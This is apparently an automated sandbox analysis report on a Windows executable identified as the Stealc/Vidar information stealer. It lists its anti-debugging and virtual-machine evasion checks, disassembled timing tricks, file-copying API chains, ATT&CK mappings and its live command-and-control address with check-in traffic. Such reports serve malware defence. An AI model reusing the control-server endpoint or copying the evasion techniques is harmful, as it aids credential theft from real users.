                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420A5F second address: 1420A7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FC850CE3D44h 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FC850CE3D36h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422662 second address: 142267B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC8515781D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC8515781DDh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1424EC6 second address: 1424ED0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC850CE3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142512E second address: 1425138 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC8515781D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1425138 second address: 1425152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC850CE3D46h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14254A9 second address: 14254F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FC8515781D8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov edx, dword ptr [ebp+12541B12h] 0x0000002a push dword ptr [ebp+122D33D7h] 0x00000030 mov edx, 0708AAC6h 0x00000035 push 4D33132Bh 0x0000003a push esi 0x0000003b push eax 0x0000003c push edx 0x0000003d je 00007FC8515781D6h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14254F2 second address: 14254F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426B1E second address: 1426B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jng 00007FC8515781D8h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jc 00007FC8515781D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426B35 second address: 1426B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jo 00007FC850CE3D3Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E05AF second address: 59E05DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC8515781DEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov si, dx 0x00000014 push eax 0x00000015 push edx 0x00000016 mov cl, bl 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E05DC second address: 59E05E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E05E0 second address: 59E0603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FC8515781E0h 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx ebx, cx 0x00000015 mov edx, esi 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E0603 second address: 59E0609 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E0609 second address: 59E060D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134044E second address: 1340467 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FC850CE3D36h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FC850CE3D38h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 118D871 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 133026F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 135C9B1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 118D88F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13BEDC3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decision (graph_0-37725)
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00EB40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00EAE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00EB47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EAF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EA1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EADB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00EADB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EB4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00EB3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EABE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00EABE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00EAEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EADF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EADF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA1160 GetSystemInfo,ExitProcess,0_2_00EA1160
                Source: file.exe, file.exe, 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1812029198.0000000001C68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWR,
                Source: file.exe, 00000000.00000002.1812029198.0000000001C61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1812029198.0000000001C35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                Source: file.exe, 00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwares
                Source: file.exe, 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node (graph_0-36537)
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node (graph_0-36540)
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node (graph_0-36556)
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node (graph_0-36552)
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node (graph_0-36592)
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node (graph_0-36425)
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA4610 VirtualProtect ?,00000004,00000100,00000000 0_2_00EA4610
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00EB9BB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB9AA0 mov eax, dword ptr fs:[00000030h] 0_2_00EB9AA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA, 0_2_00EB7690
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 4408, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00EB9790
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle, 0_2_00EB98E0
Source: file.exe, file.exe, 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: $Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE75A8 cpuid 0_2_00EE75A8
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00EB7D20
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB6BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 0_2_00EB6BC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00EB79E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00EB7BC0

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.ea0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1769403587.0000000005850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 4408, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.ea0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1769403587.0000000005850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 4408, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

MITRE ATT&CK Matrix (flattened in extraction; only techniques with signature hits are listed, grouped by tactic, with the hit counts as displayed in the report):
Execution: Command and Scripting Interpreter (2), Native API (12)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (11), DLL Side-Loading (1)
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (334)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12)
No hits under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration or Impact.
Source | Detection | Scanner | Label
file.exe | 41% | Virustotal |
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe
http://185.215.113.206/6c4adf523b719729.php= | 17% | Virustotal |
http://185.215.113.206/6c4adf523b719729.php | 17% | Virustotal |
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.php | true | | unknown
http://185.215.113.206/ | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.php2 | file.exe, 00000000.00000002.1812029198.0000000001C46000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.php= | file.exe, 00000000.00000002.1812029198.0000000001C35000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/hb5 | file.exe, 00000000.00000002.1812029198.0000000001C46000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.php%.e | file.exe, 00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.206/ws | file.exe, 00000000.00000002.1812029198.0000000001C46000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpa~ | file.exe, 00000000.00000002.1812029198.0000000001C35000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000003.1769403587.000000000587B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1544215
Start date and time: 2024-10-29 04:00:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 134
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Report size getting too big, too many NtQueryValueKey calls found.
No simulations
Match: 185.215.113.206
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
No context
Match: WHOLESALECONNECTIONSNL
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Stealc, Vidar | 185.215.113.206
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Stealc, Vidar | 185.215.113.206
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | Stealc, Vidar | 185.215.113.206
file.exe | malicious | LummaC | 185.215.113.16
No context
No context
                              No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.957814086215835
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 2'149'888 bytes
MD5: 1f9bbfe42e611b314849010fb1bbe51c
SHA1: 5a25bc214ecb669fa11dc91c84c19e5d238125ba
SHA256: 0a348ff9b393249df44a77c30c8cef6cacc54f9f6d1fcf34bfb195cef3e455b4
SHA512: 41b1d1987e58f462afe58f788d260e948d8dcc74cf0bb0ca04c65fc2fa30b1062355a787cddbc2a4d49b1d1d586ae4f9c718c73f532c92355022072bc850fdf5
SSDEEP: 49152:Zz3DrGYYGC9Zmnhb99fRP2wT0STYA2N6GGLcDbVz:h3Dq1G0ZERbPJYcTwZ
TLSH: CFA533C16D2E32A3E2ABC0F42E49B73DA74539DADE2F86BF58D198038D0717645D11B8
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
Icon Hash: 90cececece8e8eb0
Entrypoint: 0xb35000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                              Instruction
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x2e7000 | 0x67600 | 567854892c55d978421b55ae308646ab | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x2ea000 | 0x2a8000 | 0x200 | c93c1008486e6a181c0181116a00c6b4 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
oxrzanjf | 0x592000 | 0x1a2000 | 0x1a1e00 | 44e56afcfaacb928272b38f7e52b3c9a | False | 0.9948995569099611 | data | 7.953822879686721 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lnkngpyb | 0x734000 | 0x1000 | 0x400 | 3b2b09a6725a93942fdd5bdf1df16a8f | False | 0.775390625 | data | 6.076236953350956 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x735000 | 0x3000 | 0x2200 | 5f9762b3c4eaab5115f483d7b5de243e | False | 0.03699448529411765 | DOS executable (COM) | 0.3288463041264524 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-29T04:01:10.465335+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 29, 2024 04:01:09.282229900 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 29, 2024 04:01:09.287568092 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 29, 2024 04:01:09.287669897 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 29, 2024 04:01:09.289606094 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 29, 2024 04:01:09.294817924 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 29, 2024 04:01:10.180682898 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 29, 2024 04:01:10.180799961 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 29, 2024 04:01:10.184680939 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 29, 2024 04:01:10.190126896 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 29, 2024 04:01:10.465209961 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 29, 2024 04:01:10.465334892 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 29, 2024 04:01:14.134634018 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                              • 185.215.113.206
